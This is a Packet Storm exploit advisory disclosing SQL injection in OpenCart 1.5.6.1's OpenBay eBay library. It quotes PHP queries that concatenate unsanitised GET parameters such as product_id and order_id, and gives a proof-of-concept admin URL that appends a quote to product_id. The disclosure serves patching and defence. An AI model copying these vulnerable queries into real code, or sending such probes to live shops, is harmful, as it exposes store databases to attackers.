what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

OpenCart 1.5.6.1 SQL Injection

OpenCart 1.5.6.1 SQL Injection
Posted Mar 25, 2014
Authored by Saadat Ullah

OpenCart versions 1.5.6.1 and below suffer from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
SHA-256 | 703149d4078abdc95ff0f473bd181a93a4f3386cdce4320a2ca8744e981ee3f6
Download | Favorite | View

OpenCart 1.5.6.1 SQL Injection

Change Mirror Download
# Exploit Title     : OpenCart <= 1.5.6.1 SQL Injection
# Date              : 2014/3/26
# Exploit Author    : Saadat Ullah , saadi_linux@rocketmail.com
# Software Link     : http://www.opencart.com/index.php?route=download/download
                    : https://github.com/opencart
# Software web      : www.opencart.com
# Author HomePage   : http://security-geeks.blogspot.com/
# Tested on: Server : Apache/2.2.15 PHP/5.3.3

#Opencart suffers from multipe SQL injection in ebay.php the bug is more about 
privilege escalation as attacker may need openbay module access .

Poc
Poorly coded file full of SQLi opencart/system/library/ebay.php
In file opencart/system/library/ebay.php
product_id is used in a SQL query without being sanitize.

public function getEbayItemId($product_id) {
    $this->log('getEbayItemId() - Product ID: '.$product_id);

    $qry = $this->db->query("SELECT `ebay_item_id` FROM `" . DB_PREFIX . "ebay_listing` WHERE `product_id` = '".$product_id."' AND `status` = '1' LIMIT 1");
..............
Function is called on many locations and paramter is passed without santize.
In opencart\admin\controller\openbay\openbay.php
public function editLoad() {
    ...
    $item_id        = $this->openbay->ebay->getEbayItemId($this->request->get['product_id']);
..............
Where $this->request->get['product_id'] comming from GET field.
Similarly More

public function isEbayOrder($id) {
    ...
    $qry = $this->db->query("SELECT `comment` FROM `" . DB_PREFIX . "order_history` WHERE `comment` LIKE '[eBay Import:%]' AND `order_id` = '".$id."' LIMIT 1");

In opencart\admin\controller\extension\openbay.php
    public function ajaxOrderInfo()
    ...
    if($this->openbay->ebay->isEbayOrder($this->request->get['order_id']) !== false){
..............
More
public function getProductStockLevel($productId, $sku = '') {
    ...
    $qry = $this->db->query("SELECT `quantity`, `status` FROM `" . DB_PREFIX . "product` WHERE `product_id` = '".$productId."' LIMIT 1");
..............
ebay.php has many more..
User should have openbay module access
http://localhost/opencart/admin/index.php?route=openbay/openbay/editLoad&token=5750af85a1d913aded2f6e2128616cb3&product_id=1'

#Independent Pakistani Security Researcher
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    0 Files
  • 8
    Nov 8th
    0 Files
  • 9
    Nov 9th
    0 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close